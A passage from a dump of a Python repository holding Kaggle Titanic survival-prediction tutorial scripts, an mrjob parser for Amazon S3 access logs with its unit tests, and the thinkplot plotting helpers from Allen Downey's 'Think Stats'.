pd.read_csv('train.csv', header=0) # Load the train file into a dataframe # I need to convert all strings to integer classifiers. # I need to fill in the missing values of the data and make it complete. # female = 0, Male = 1 train_df['Gender'] = train_df['Sex'].map( {'female': 0, 'male': 1} ).astype(int) # Embarked from 'C', 'Q', 'S' # Note this is not ideal: in translating categories to numbers, Port "2" is not 2 times greater than Port "1", etc. 
# All missing Embarked -> just make them embark from most common place if len(train_df.Embarked[ train_df.Embarked.isnull() ]) > 0: train_df.Embarked[ train_df.Embarked.isnull() ] = train_df.Embarked.dropna().mode().values Ports = list(enumerate(np.unique(train_df['Embarked']))) # determine all values of Embarked, Ports_dict = { name : i for i, name in Ports } # set up a dictionary in the form Ports : index train_df.Embarked = train_df.Embarked.map( lambda x: Ports_dict[x]).astype(int) # Convert all Embark strings to int # All the ages with no data -> make the median of all Ages median_age = train_df['Age'].dropna().median() if len(train_df.Age[ train_df.Age.isnull() ]) > 0: train_df.loc[ (train_df.Age.isnull()), 'Age'] = median_age # Remove the Name column, Cabin, Ticket, and Sex (since I copied and filled it to Gender) train_df = train_df.drop(['Name', 'Sex', 'Ticket', 'Cabin', 'PassengerId'], axis=1) # TEST DATA test_df = pd.read_csv('test.csv', header=0) # Load the test file into a dataframe # I need to do the same with the test data now, so that the columns are the same as the training data # I need to convert all strings to integer classifiers: # female = 0, Male = 1 test_df['Gender'] = test_df['Sex'].map( {'female': 0, 'male': 1} ).astype(int) # Embarked from 'C', 'Q', 'S' # All missing Embarked -> just make them embark from most common place if len(test_df.Embarked[ test_df.Embarked.isnull() ]) > 0: test_df.Embarked[ test_df.Embarked.isnull() ] = test_df.Embarked.dropna().mode().values # Again convert all Embarked strings to int test_df.Embarked = test_df.Embarked.map( lambda x: Ports_dict[x]).astype(int) # All the ages with no data -> make the median of all Ages median_age = test_df['Age'].dropna().median() if len(test_df.Age[ test_df.Age.isnull() ]) > 0: test_df.loc[ (test_df.Age.isnull()), 'Age'] = median_age # All the missing Fares -> assume median of their respective class if len(test_df.Fare[ test_df.Fare.isnull() ]) > 0: median_fare = np.zeros(3) for f in range(0,3): # loop 0 to 2 median_fare[f] = test_df[ test_df.Pclass == f+1 ]['Fare'].dropna().median() for f in range(0,3): # loop 0 to 2 test_df.loc[ (test_df.Fare.isnull()) & (test_df.Pclass == f+1 ), 'Fare'] = median_fare[f] # Collect the test data's PassengerIds before dropping it ids = test_df['PassengerId'].values # Remove the Name column, Cabin, Ticket, and Sex (since I copied and filled it to Gender) test_df = test_df.drop(['Name', 'Sex', 'Ticket', 'Cabin', 'PassengerId'], axis=1) # The data is now ready to go. So lets fit to the train, then predict to the test! # Convert back to a numpy array train_data = train_df.values test_data = test_df.values print 'Training...' forest = RandomForestClassifier(n_estimators=100) forest = forest.fit( train_data[0::,1::], train_data[0::,0] ) print 'Predicting...' output = forest.predict(test_data).astype(int) predictions_file = open("myfirstforest.csv", "wb") open_file_object = csv.writer(predictions_file) open_file_object.writerow(["PassengerId","Survived"]) open_file_object.writerows(zip(ids, output)) predictions_file.close() print 'Done.' 
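# A rough way to gauge how well the forest generalises (illustrative only and
# commented out; it assumes the cross-validation helpers live in
# sklearn.cross_validation, as in the older scikit-learn releases this script
# targets):
#   from sklearn.cross_validation import cross_val_score
#   scores = cross_val_score(forest, train_data[0::,1::], train_data[0::,0], cv=5)
#   print 'Cross-validated accuracy: %.3f' % scores.mean()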
File: data/titanic/gendermodel.py

""" This simple code is designed to teach a basic user to read in the files in python,
simply find what proportion of males and females survived and make a predictive model based on this
Author : AstroDave
Date : 18 September 2012
Revised: 28 March 2014

"""

import csv as csv
import numpy as np

csv_file_object = csv.reader(open('train.csv', 'rb'))   # Load in the csv file
header = csv_file_object.next()                          # Skip the first line as it is a header
data = []                                                # Create a variable to hold the data

for row in csv_file_object:      # Skip through each row in the csv file,
    data.append(row[0:])         # adding each row to the data variable
data = np.array(data)            # Then convert from a list to an array.

# Now I have an array of 12 columns and 891 rows
# I can access any element I want, so the entire first column would
# be data[0::,0].astype(np.float) -- This means all of the rows (from start to end), in column 0
# I have to add the .astype() command, because
# when appending the rows, python thought it was a string - so needed to convert

# Set some variables
number_passengers = np.size(data[0::,1].astype(np.float))
number_survived = np.sum(data[0::,1].astype(np.float))
proportion_survivors = number_survived / number_passengers

# I can now find the stats of all the women on board,
# by making an array that lists True/False whether each row is female
women_only_stats = data[0::,4] == "female"   # This finds where all the women are
men_only_stats = data[0::,4] != "female"     # This finds where all the men are (note != means 'not equal')

# I can now filter the whole data, to find statistics for just women, by just placing
# women_only_stats as a "mask" on my full data -- Use it in place of the '0::' part of the array index.
# You can test it by placing it there, and requesting column index [4], and the output should all read 'female'
# e.g. try typing this:   data[women_only_stats,4]
women_onboard = data[women_only_stats,1].astype(np.float)
men_onboard = data[men_only_stats,1].astype(np.float)

# and derive some statistics about them
proportion_women_survived = np.sum(women_onboard) / np.size(women_onboard)
proportion_men_survived = np.sum(men_onboard) / np.size(men_onboard)

print 'Proportion of women who survived is %s' % proportion_women_survived
print 'Proportion of men who survived is %s' % proportion_men_survived

# Now that I have my indicator that women were much more likely to survive,
# I am done with the training set.
# Now I will read in the test file and write out my simplistic prediction:
# if female, then model that she survived (1)
# if male, then model that he did not survive (0)

# First, read in test.csv
test_file = open('test.csv', 'rb')
test_file_object = csv.reader(test_file)
header = test_file_object.next()

# Also open a new file so I can write to it. Call it something descriptive.
# Finally, loop through each row in the test file, and look in column index [3] (which is 'Sex').
# Write out the PassengerId, and my prediction.

predictions_file = open("gendermodel.csv", "wb")
predictions_file_object = csv.writer(predictions_file)
predictions_file_object.writerow(["PassengerId", "Survived"])   # write the column headers
for row in test_file_object:                              # For each row in test file,
    if row[3] == 'female':                                # is it a female, if yes then
        predictions_file_object.writerow([row[0], "1"])   # write the PassengerId, and predict 1
    else:                                                 # or else if male,
        predictions_file_object.writerow([row[0], "0"])   # write the PassengerId, and predict 0.
test_file.close()   # Close out the files.
predictions_file.close() File: data/titanic/genderclassmodel.py """ Now that the user can read in a file this creates a model which uses the price, class and gender Author : AstroDave Date : 18th September 2012 Revised : 28 March 2014 """ import csv as csv import numpy as np csv_file_object = csv.reader(open('train.csv', 'rb')) # Load in the csv file header = csv_file_object.next() # Skip the fist line as it is a header data=[] # Create a variable to hold the data for row in csv_file_object: # Skip through each row in the csv file data.append(row) # adding each row to the data variable data = np.array(data) # Then convert from a list to an array # In order to analyse the price column I need to bin up that data # here are my binning parameters, the problem we face is some of the fares are very large # So we can either have a lot of bins with nothing in them or we can just lose some # information by just considering that anythng over 39 is simply in the last bin. # So we add a ceiling fare_ceiling = 40 # then modify the data in the Fare column to = 39, if it is greater or equal to the ceiling data[ data[0::,9].astype(np.float) >= fare_ceiling, 9 ] = fare_ceiling - 1.0 fare_bracket_size = 10 number_of_price_brackets = fare_ceiling / fare_bracket_size number_of_classes = 3 # I know there were 1st, 2nd and 3rd classes on board. number_of_classes = len(np.unique(data[0::,2])) # But it's better practice to calculate this from the Pclass directly: # just take the length of an array of UNIQUE values in column index 2 # This reference matrix will show the proportion of survivors as a sorted table of # gender, class and ticket fare. # First initialize it with all zeros survival_table = np.zeros([2,number_of_classes,number_of_price_brackets],float) # I can now find the stats of all the women and men on board for i in xrange(number_of_classes): for j in xrange(number_of_price_brackets): women_only_stats = data[ (data[0::,4] == "female") \ & (data[0::,2].astype(np.float) == i+1) \ & (data[0:,9].astype(np.float) >= j*fare_bracket_size) \ & (data[0:,9].astype(np.float) < (j+1)*fare_bracket_size), 1] men_only_stats = data[ (data[0::,4] != "female") \ & (data[0::,2].astype(np.float) == i+1) \ & (data[0:,9].astype(np.float) >= j*fare_bracket_size) \ & (data[0:,9].astype(np.float) < (j+1)*fare_bracket_size), 1] #if i == 0 and j == 3: survival_table[0,i,j] = np.mean(women_only_stats.astype(np.float)) # Female stats survival_table[1,i,j] = np.mean(men_only_stats.astype(np.float)) # Male stats # Since in python if it tries to find the mean of an array with nothing in it # (such that the denominator is 0), then it returns nan, we can convert these to 0 # by just saying where does the array not equal the array, and set these to 0. survival_table[ survival_table != survival_table ] = 0. # Now I have my proportion of survivors, simply round them such that if <0.5 # I predict they dont surivive, and if >= 0.5 they do survival_table[ survival_table < 0.5 ] = 0 survival_table[ survival_table >= 0.5 ] = 1 # Now I have my indicator I can read in the test file and write out # if a women then survived(1) if a man then did not survived (0) # First read in test test_file = open('test.csv', 'rb') test_file_object = csv.reader(test_file) header = test_file_object.next() # Also open the a new file so I can write to it. 
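# As a concrete illustration of the lookup performed below (example values,
# not from the data): a 2nd-class female whose fare falls in the 10-19
# bracket is scored with survival_table[0, 1, 1], i.e.
# [gender index, Pclass - 1, fare bin].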
predictions_file = open("genderclassmodel.csv", "wb") predictions_file_object = csv.writer(predictions_file) predictions_file_object.writerow(["PassengerId", "Survived"]) # First thing to do is bin up the price file for row in test_file_object: for j in xrange(number_of_price_brackets): # If there is no fare then place the price of the ticket according to class try: row[8] = float(row[8]) # No fare recorded will come up as a string so # try to make it a float except: # If fails then just bin the fare according to the class bin_fare = 3 - float(row[1]) break # Break from the loop and move to the next row if row[8] > fare_ceiling: # Otherwise now test to see if it is higher # than the fare ceiling we set earlier bin_fare = number_of_price_brackets - 1 break # And then break to the next row if row[8] >= j*fare_bracket_size\ and row[8] < (j+1)*fare_bracket_size: # If passed these tests then loop through # each bin until you find the right one # append it to the bin_fare # and move to the next loop bin_fare = j break # Now I have the binned fare, passenger class, and whether female or male, we can # just cross ref their details with our survival table if row[3] == 'female': predictions_file_object.writerow([row[0], "%d" % int(survival_table[ 0, float(row[1]) - 1, bin_fare ])]) else: predictions_file_object.writerow([row[0], "%d" % int(survival_table[ 1, float(row[1]) - 1, bin_fare])]) # Close out the files test_file.close() predictions_file.close() File: mapreduce/__init__.py File: mapreduce/test_mr_s3_log_parser.py from StringIO import StringIO import unittest2 as unittest from mr_s3_log_parser import MrS3LogParser class MrTestsUtil: def run_mr_sandbox(self, mr_job, stdin): # inline runs the job in the same process so small jobs tend to # run faster and stack traces are simpler # --no-conf prevents options from local mrjob.conf from polluting # the testing environment # "-" reads from standard in mr_job.sandbox(stdin=stdin) # make_runner ensures job cleanup is performed regardless of # success or failure with mr_job.make_runner() as runner: runner.run() for line in runner.stream_output(): key, value = mr_job.parse_output_line(line) yield value class TestMrS3LogParser(unittest.TestCase): mr_job = None mr_tests_util = None RAW_LOG_LINE_INVALID = \ '00000fe9688b6e57f75bd2b7f7c1610689e8f01000000' \ '00000388225bcc00000 ' \ 's3-storage [22/Jul/2013:21:03:27 +0000] ' \ '00.111.222.33 ' \ RAW_LOG_LINE_VALID = \ '00000fe9688b6e57f75bd2b7f7c1610689e8f01000000' \ '00000388225bcc00000 ' \ 's3-storage [22/Jul/2013:21:03:27 +0000] ' \ '00.111.222.33 ' \ 'arn:aws:sts::000005646931:federated-user/user 00000AB825500000 ' \ 'REST.HEAD.OBJECT user/file.pdf ' \ '"HEAD /user/file.pdf?versionId=00000XMHZJp6DjM9x500000' \ '00000SDZk ' \ 'HTTP/1.1" 200 - - 4000272 18 - "-" ' \ '"Boto/2.5.1 (darwin) USER-AGENT/1.0.14.0" ' \ '00000XMHZJp6DjM9x5JVEAMo8MG00000' DATE_TIME_ZONE_INVALID = "AB/Jul/2013:21:04:17 +0000" DATE_TIME_ZONE_VALID = "22/Jul/2013:21:04:17 +0000" DATE_VALID = "2013-07-22" DATE_TIME_VALID = "2013-07-22 21:04:17" TIME_ZONE_VALID = "+0000" def __init__(self, *args, **kwargs): super(TestMrS3LogParser, self).__init__(*args, **kwargs) self.mr_job = MrS3LogParser(['-r', 'inline', '--no-conf', '-']) self.mr_tests_util = MrTestsUtil() def test_invalid_log_lines(self): stdin = StringIO(self.RAW_LOG_LINE_INVALID) for result in self.mr_tests_util.run_mr_sandbox(self.mr_job, stdin): self.assertEqual(result.find("Error"), 0) def test_valid_log_lines(self): stdin = StringIO(self.RAW_LOG_LINE_VALID) for result in 
self.mr_tests_util.run_mr_sandbox(self.mr_job, stdin): self.assertEqual(result.find("Error"), -1) def test_clean_date_time_zone(self): date, date_time, time_zone_parsed = \ self.mr_job.clean_date_time_zone(self.DATE_TIME_ZONE_VALID) self.assertEqual(date, self.DATE_VALID) self.assertEqual(date_time, self.DATE_TIME_VALID) self.assertEqual(time_zone_parsed, self.TIME_ZONE_VALID) # Use a lambda to delay the calling of clean_date_time_zone so that # assertRaises has enough time to handle it properly self.assertRaises(ValueError, lambda: self.mr_job.clean_date_time_zone( self.DATE_TIME_ZONE_INVALID)) if __name__ == '__main__': unittest.main() File: mapreduce/mr_s3_log_parser.py import time from mrjob.job import MRJob from mrjob.protocol import RawValueProtocol, ReprProtocol import re class MrS3LogParser(MRJob): """Parses the logs from S3 based on the S3 logging format: http://docs.aws.amazon.com/AmazonS3/latest/dev/LogFormat.html Aggregates a user's daily requests by user agent and operation Outputs date_time, requester, user_agent, operation, count """ LOGPATS = r'(\S+) (\S+) \[(.*?)\] (\S+) (\S+) ' \ r'(\S+) (\S+) (\S+) ("([^"]+)"|-) ' \ r'(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) ' \ r'("([^"]+)"|-) ("([^"]+)"|-)' NUM_ENTRIES_PER_LINE = 17 logpat = re.compile(LOGPATS) (S3_LOG_BUCKET_OWNER, S3_LOG_BUCKET, S3_LOG_DATE_TIME, S3_LOG_IP, S3_LOG_REQUESTER_ID, S3_LOG_REQUEST_ID, S3_LOG_OPERATION, S3_LOG_KEY, S3_LOG_HTTP_METHOD, S3_LOG_HTTP_STATUS, S3_LOG_S3_ERROR, S3_LOG_BYTES_SENT, S3_LOG_OBJECT_SIZE, S3_LOG_TOTAL_TIME, S3_LOG_TURN_AROUND_TIME, S3_LOG_REFERER, S3_LOG_USER_AGENT) = range(NUM_ENTRIES_PER_LINE) DELIMITER = '\t' # We use RawValueProtocol for input to be format agnostic # and avoid any type of parsing errors INPUT_PROTOCOL = RawValueProtocol # We use RawValueProtocol for output so we can output raw lines # instead of (k, v) pairs OUTPUT_PROTOCOL = RawValueProtocol # Encode the intermediate records using repr() instead of JSON, so the # record doesn't get Unicode-encoded INTERNAL_PROTOCOL = ReprProtocol def clean_date_time_zone(self, raw_date_time_zone): """Converts entry 22/Jul/2013:21:04:17 +0000 to the format 'YYYY-MM-DD HH:MM:SS' which is more suitable for loading into a database such as Redshift or RDS Note: requires the chars "[ ]" to be stripped prior to input Returns the converted datetime annd timezone or None for both values if failed TODO: Needs to combine timezone with date as one field """ date_time = None time_zone_parsed = None # TODO: Probably cleaner to parse this with a regex date_parsed = raw_date_time_zone[:raw_date_time_zone.find(":")] time_parsed = raw_date_time_zone[raw_date_time_zone.find(":") + 1: raw_date_time_zone.find("+") - 1] time_zone_parsed = raw_date_time_zone[raw_date_time_zone.find("+"):] try: date_struct = time.strptime(date_parsed, "%d/%b/%Y") converted_date = time.strftime("%Y-%m-%d", date_struct) date_time = converted_date + " " + time_parsed # Throws a ValueError exception if the operation fails that is # caught by the calling function and is handled appropriately except ValueError as error: raise ValueError(error) else: return converted_date, date_time, time_zone_parsed def mapper(self, _, line): line = line.strip() match = self.logpat.search(line) date_time = None requester = None user_agent = None operation = None try: for n in range(self.NUM_ENTRIES_PER_LINE): group = match.group(1 + n) if n == self.S3_LOG_DATE_TIME: date, date_time, time_zone_parsed = \ self.clean_date_time_zone(group) # Leave the following line of code if # you want to aggregate 
by date date_time = date + " 00:00:00" elif n == self.S3_LOG_REQUESTER_ID: requester = group elif n == self.S3_LOG_USER_AGENT: user_agent = group elif n == self.S3_LOG_OPERATION: operation = group else: pass except Exception: yield (("Error while parsing line: %s", line), 1) else: yield ((date_time, requester, user_agent, operation), 1) def reducer(self, key, values): output = list(key) output = self.DELIMITER.join(output) + \ self.DELIMITER + \ str(sum(values)) yield None, output def steps(self): return [ self.mr(mapper=self.mapper, reducer=self.reducer) ] if __name__ == '__main__': MrS3LogParser.run() File: scipy/thinkplot.py """This file contains code for use with "Think Stats", by Allen B. Downey, available from greenteapress.com Copyright 2014 Allen B. Downey License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html """ from __future__ import print_function import math import matplotlib import matplotlib.pyplot as pyplot import numpy as np import pandas import warnings # customize some matplotlib attributes #matplotlib.rc('figure', figsize=(4, 3)) #matplotlib.rc('font', size=14.0) #matplotlib.rc('axes', labelsize=22.0, titlesize=22.0) #matplotlib.rc('legend', fontsize=20.0) #matplotlib.rc('xtick.major', size=6.0) #matplotlib.rc('xtick.minor', size=3.0) #matplotlib.rc('ytick.major', size=6.0) #matplotlib.rc('ytick.minor', size=3.0) class _Brewer(object): """Encapsulates a nice sequence of colors. Shades of blue that look good in color and can be distinguished in grayscale (up to a point). Borrowed from http://colorbrewer2.org/ """ color_iter = None colors = ['#081D58', '#253494', '#225EA8', '#1D91C0', '#41B6C4', '#7FCDBB', '#C7E9B4', '#EDF8B1', '#FFFFD9'] # lists that indicate which colors to use depending on how many are used which_colors = [[], [1], [1, 3], [0, 2, 4], [0, 2, 4, 6], [0, 2, 3, 5, 6], [0, 2, 3, 4, 5, 6], [0, 1, 2, 3, 4, 5, 6], ] @classmethod def Colors(cls): """Returns the list of colors. """ return cls.colors @classmethod def ColorGenerator(cls, n): """Returns an iterator of color strings. n: how many colors will be used """ for i in cls.which_colors[n]: yield cls.colors[i] raise StopIteration('Ran out of colors in _Brewer.ColorGenerator') @classmethod def InitializeIter(cls, num): """Initializes the color iterator with the given number of colors.""" cls.color_iter = cls.ColorGenerator(num) @classmethod def ClearIter(cls): """Sets the color iterator to None.""" cls.color_iter = None @classmethod def GetIter(cls): """Gets the color iterator.""" if cls.color_iter is None: cls.InitializeIter(7) return cls.color_iter def PrePlot(num=None, rows=None, cols=None): """Takes hints about what's coming. num: number of lines that will be plotted rows: number of rows of subplots cols: number of columns of subplots """ if num: _Brewer.InitializeIter(num) if rows is None and cols is None: return if rows is not None and cols is None: cols = 1 if cols is not None and rows is None: rows = 1 # resize the image, depending on the number of rows and cols size_map = {(1, 1): (8, 6), (1, 2): (14, 6), (1, 3): (14, 6), (2, 2): (10, 10), (2, 3): (16, 10), (3, 1): (8, 10), } if (rows, cols) in size_map: fig = pyplot.gcf() fig.set_size_inches(*size_map[rows, cols]) # create the first subplot if rows > 1 or cols > 1: pyplot.subplot(rows, cols, 1) global SUBPLOT_ROWS, SUBPLOT_COLS SUBPLOT_ROWS = rows SUBPLOT_COLS = cols def SubPlot(plot_number, rows=None, cols=None): """Configures the number of subplots and changes the current plot. 
rows: int cols: int plot_number: int """ rows = rows or SUBPLOT_ROWS cols = cols or SUBPLOT_COLS pyplot.subplot(rows, cols, plot_number) def _Underride(d, **options): """Add key-value pairs to d only if key is not in d. If d is None, create a new dictionary. d: dictionary options: keyword args to add to d """ if d is None: d = {} for key, val in options.items(): d.setdefault(key, val) return d def Clf(): """Clears the figure and any hints that have been set.""" global LOC LOC = None _Brewer.ClearIter() pyplot.clf() fig = pyplot.gcf() fig.set_size_inches(8, 6) def Figure(**options): """Sets options for the current figure.""" _Underride(options, figsize=(6, 8)) pyplot.figure(**options) def _UnderrideColor(options): if 'color' in options: return options color_iter = _Brewer.GetIter() if color_iter: try: options['color'] = next(color_iter) except StopIteration: # TODO: reconsider whether this should warn # warnings.warn('Warning: Brewer ran out of colors.') _Brewer.ClearIter() return options def Plot(obj, ys=None, style='', **options): """Plots a line. Args: obj: sequence of x values, or Series, or anything with Render() ys: sequence of y values style: style string passed along to pyplot.plot options: keyword args passed to pyplot.plot """ options = _UnderrideColor(options) label = getattr(obj, 'label', '_nolegend_') options = _Underride(options, linewidth=3, alpha=0.8, label=label) xs = obj if ys is None: if hasattr(obj, 'Render'): xs, ys = obj.Render() if isinstance(obj, pandas.Series): ys = obj.values xs = obj.index if ys is None: pyplot.plot(xs, style, **options) else: pyplot.plot(xs, ys, style, **options) def FillBetween(xs, y1, y2=None, where=None, **options): """Plots a line. Args: xs: sequence of x values y1: sequence of y values y2: sequence of y values where: sequence of boolean options: keyword args passed to pyplot.fill_between """ options = _UnderrideColor(options) options = _Underride(options, linewidth=0, alpha=0.5) pyplot.fill_between(xs, y1, y2, where, **options) def Bar(xs, ys, **options): """Plots a line. Args: xs: sequence of x values ys: sequence of y values options: keyword args passed to pyplot.bar """ options = _UnderrideColor(options) options = _Underride(options, linewidth=0, alpha=0.6) pyplot.bar(xs, ys, **options) def Scatter(xs, ys=None, **options): """Makes a scatter plot. xs: x values ys: y values options: options passed to pyplot.scatter """ options = _Underride(options, color='blue', alpha=0.2, s=30, edgecolors='none') if ys is None and isinstance(xs, pandas.Series): ys = xs.values xs = xs.index pyplot.scatter(xs, ys, **options) def HexBin(xs, ys, **options): """Makes a scatter plot. xs: x values ys: y values options: options passed to pyplot.scatter """ options = _Underride(options, cmap=matplotlib.cm.Blues) pyplot.hexbin(xs, ys, **options) def Pdf(pdf, **options): """Plots a Pdf, Pmf, or Hist as a line. Args: pdf: Pdf, Pmf, or Hist object options: keyword args passed to pyplot.plot """ low, high = options.pop('low', None), options.pop('high', None) n = options.pop('n', 101) xs, ps = pdf.Render(low=low, high=high, n=n) options = _Underride(options, label=pdf.label) Plot(xs, ps, **options) def Pdfs(pdfs, **options): """Plots a sequence of PDFs. Options are passed along for all PDFs. If you want different options for each pdf, make multiple calls to Pdf. Args: pdfs: sequence of PDF objects options: keyword args passed to pyplot.plot """ for pdf in pdfs: Pdf(pdf, **options) def Hist(hist, **options): """Plots a Pmf or Hist with a bar plot. 
The default width of the bars is based on the minimum difference between values in the Hist. If that's too small, you can override it by providing a width keyword argument, in the same units as the values. Args: hist: Hist or Pmf object options: keyword args passed to pyplot.bar """ # find the minimum distance between adjacent values xs, ys = hist.Render() if 'width' not in options: try: options['width'] = 0.9 * np.diff(xs).min() except TypeError: warnings.warn("Hist: Can't compute bar width automatically." "Check for non-numeric types in Hist." "Or try providing width option." ) options = _Underride(options, label=hist.label) options = _Underride(options, align='center') if options['align'] == 'left': options['align'] = 'edge' elif options['align'] == 'right': options['align'] = 'edge' options['width'] *= -1 Bar(xs, ys, **options) def Hists(hists, **options): """Plots two histograms as interleaved bar plots. Options are passed along for all PMFs. If you want different options for each pmf, make multiple calls to Pmf. Args: hists: list of two Hist or Pmf objects options: keyword args passed to pyplot.plot """ for hist in hists: Hist(hist, **options) def Pmf(pmf, **options): """Plots a Pmf or Hist as a line. Args: pmf: Hist or Pmf object options: keyword args passed to pyplot.plot """ xs, ys = pmf.Render() low, high = min(xs), max(xs) width = options.pop('width', None) if width is None: try: width = np.diff(xs).min() except TypeError: warnings.warn("Pmf: Can't compute bar width automatically." "Check for non-numeric types in Pmf." "Or try providing width option.") points = [] lastx = np.nan lasty = 0 for x, y in zip(xs, ys): if (x - lastx) > 1e-5: points.append((lastx, 0)) points.append((x, 0)) points.append((x, lasty)) points.append((x, y)) points.append((x+width, y)) lastx = x + width lasty = y points.append((lastx, 0)) pxs, pys = zip(*points) align = options.pop('align', 'center') if align == 'center': pxs = np.array(pxs) - width/2.0 if align == 'right': pxs = np.array(pxs) - width options = _Underride(options, label=pmf.label) Plot(pxs, pys, **options) def Pmfs(pmfs, **options): """Plots a sequence of PMFs. Options are passed along for all PMFs. If you want different options for each pmf, make multiple calls to Pmf. Args: pmfs: sequence of PMF objects options: keyword args passed to pyplot.plot """ for pmf in pmfs: Pmf(pmf, **options) def Diff(t): """Compute the differences between adjacent elements in a sequence. Args: t: sequence of number Returns: sequence of differences (length one less than t) """ diffs = [t[i+1] - t[i] for i in range(len(t)-1)] return diffs def Cdf(cdf, complement=False, transform=None, **options): """Plots a CDF as a line. Args: cdf: Cdf object complement: boolean, whether to plot the complementary CDF transform: string, one of 'exponential', 'pareto', 'weibull', 'gumbel' options: keyword args passed to pyplot.plot Returns: dictionary with the scale options that should be passed to Config, Show or Save. 
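    Illustrative example (assumes `cdf` is a thinkstats2.Cdf, the usual input
    for this module; any object with a Render() method and a label works):

        scale = Cdf(cdf, complement=True)
        Show(**scale)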
""" xs, ps = cdf.Render() xs = np.asarray(xs) ps = np.asarray(ps) scale = dict(xscale='linear', yscale='linear') for s in ['xscale', 'yscale']: if s in options: scale[s] = options.pop(s) if transform == 'exponential': complement = True scale['yscale'] = 'log' if transform == 'pareto': complement = True scale['yscale'] = 'log' scale['xscale'] = 'log' if complement: ps = [1.0-p for p in ps] if transform == 'weibull': xs = np.delete(xs, -1) ps = np.delete(ps, -1) ps = [-math.log(1.0-p) for p in ps] scale['xscale'] = 'log' scale['yscale'] = 'log' if transform == 'gumbel': xs = xp.delete(xs, 0) ps = np.delete(ps, 0) ps = [-math.log(p) for p in ps] scale['yscale'] = 'log' options = _Underride(options, label=cdf.label) Plot(xs, ps, **options) return scale def Cdfs(cdfs, complement=False, transform=None, **options): """Plots a sequence of CDFs. cdfs: sequence of CDF objects complement: boolean, whether to plot the complementary CDF transform: string, one of 'exponential', 'pareto', 'weibull', 'gumbel' options: keyword args passed to pyplot.plot """ for cdf in cdfs: Cdf(cdf, complement, transform, **options) def Contour(obj, pcolor=False, contour=True, imshow=False, **options): """Makes a contour plot. d: map from (x, y) to z, or object that provides GetDict pcolor: boolean, whether to make a pseudocolor plot contour: boolean, whether to make a contour plot imshow: boolean, whether to use pyplot.imshow options: keyword args passed to pyplot.pcolor and/or pyplot.contour """ try: d = obj.GetDict() except AttributeError: d = obj _Underride(options, linewidth=3, cmap=matplotlib.cm.Blues) xs, ys = zip(*d.keys()) xs = sorted(set(xs)) ys = sorted(set(ys)) X, Y = np.meshgrid(xs, ys) func = lambda x, y: d.get((x, y), 0) func = np.vectorize(func) Z = func(X, Y) x_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False) axes = pyplot.gca() axes.xaxis.set_major_formatter(x_formatter) if pcolor: pyplot.pcolormesh(X, Y, Z, **options) if contour: cs = pyplot.contour(X, Y, Z, **options) pyplot.clabel(cs, inline=1, fontsize=10) if imshow: extent = xs[0], xs[-1], ys[0], ys[-1] pyplot.imshow(Z, extent=extent, **options) def Pcolor(xs, ys, zs, pcolor=True, contour=False, **options): """Makes a pseudocolor plot. xs: ys: zs: pcolor: boolean, whether to make a pseudocolor plot contour: boolean, whether to make a contour plot options: keyword args passed to pyplot.pcolor and/or pyplot.contour """ _Underride(options, linewidth=3, cmap=matplotlib.cm.Blues) X, Y = np.meshgrid(xs, ys) Z = zs x_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False) axes = pyplot.gca() axes.xaxis.set_major_formatter(x_formatter) if pcolor: pyplot.pcolormesh(X, Y, Z, **options) if contour: cs = pyplot.contour(X, Y, Z, **options) pyplot.clabel(cs, inline=1, fontsize=10) def Text(x, y, s, **options): """Puts text in a figure. x: number y: number s: string options: keyword args passed to pyplot.text """ options = _Underride(options, fontsize=16, verticalalignment='top', horizontalalignment='left') pyplot.text(x, y, s, **options) LEGEND = True LOC = None def Config(**options): """Configures the plot. Pulls options out of the option dictionary and passes them to the corresponding pyplot functions. 
""" names = ['title', 'xlabel', 'ylabel', 'xscale', 'yscale', 'xticks', 'yticks', 'axis', 'xlim', 'ylim'] for name in names: if name in options: getattr(pyplot, name)(options[name]) # looks like this is not necessary: matplotlib understands text loc specs loc_dict = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4, 'right': 5, 'center left': 6, 'center right': 7, 'lower center': 8, 'upper center': 9, 'center': 10, } global LEGEND LEGEND = options.get('legend', LEGEND) if LEGEND: global LOC LOC = options.get('loc', LOC) pyplot.legend(loc=LOC) def Show(**options): """Shows the plot. For options, see Config. options: keyword args used to invoke various pyplot functions """ clf = options.pop('clf', True) Config(**options) pyplot.show() if clf: Clf() def Plotly(**options): """Shows the plot. For options, see Config. options: keyword args used to invoke various pyplot functions """ clf = options.pop('clf', True) Config(**options) import plotly.plotly as plotly url = plotly.plot_mpl(pyplot.gcf()) if clf: Clf() return url def Save(root=None, formats=None, **options): """Saves the plot in the given formats and clears the figure. For options, see Config. Args: root: string filename root formats: list of string formats options: keyword args used to invoke various pyplot functions """ clf = options.pop('clf', True) Config(**options) if formats is None: formats = ['pdf', 'eps'] try: formats.remove('plotly') Plotly(clf=False) except ValueError: pass if root: for fmt in formats: SaveFormat(root, fmt) if clf: Clf() def SaveFormat(root, fmt='eps'): """Writes the current figure to a file in the given format. Args: root: string filename root fmt: string format """ filename = '%s.%s' % (root, fmt) print('Writing', filename) pyplot.savefig(filename, format=fmt, dpi=300) # provide aliases for calling functons with lower-case names preplot = PrePlot subplot = SubPlot clf = Clf figure = Figure plot = Plot text = Text scatter = Scatter pmf = Pmf pmfs = Pmfs hist = Hist hists = Hists diff = Diff cdf = Cdf cdfs = Cdfs contour = Contour pcolor = Pcolor config = Config show = Show save = Save def main(): color_iter = _Brewer.ColorGenerator(7) for color in color_iter: print(color) if __name__ == '__main__': main() File: scipy/__init__.py File: scipy/first.py """This file contains code used in "Think Stats", by Allen B. Downey, available from greenteapress.com Copyright 2014 Allen B. Downey License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html """ from __future__ import print_function import math import numpy as np import nsfg import thinkstats2 import thinkplot def MakeFrames(): """Reads pregnancy data and partitions first babies and others. 
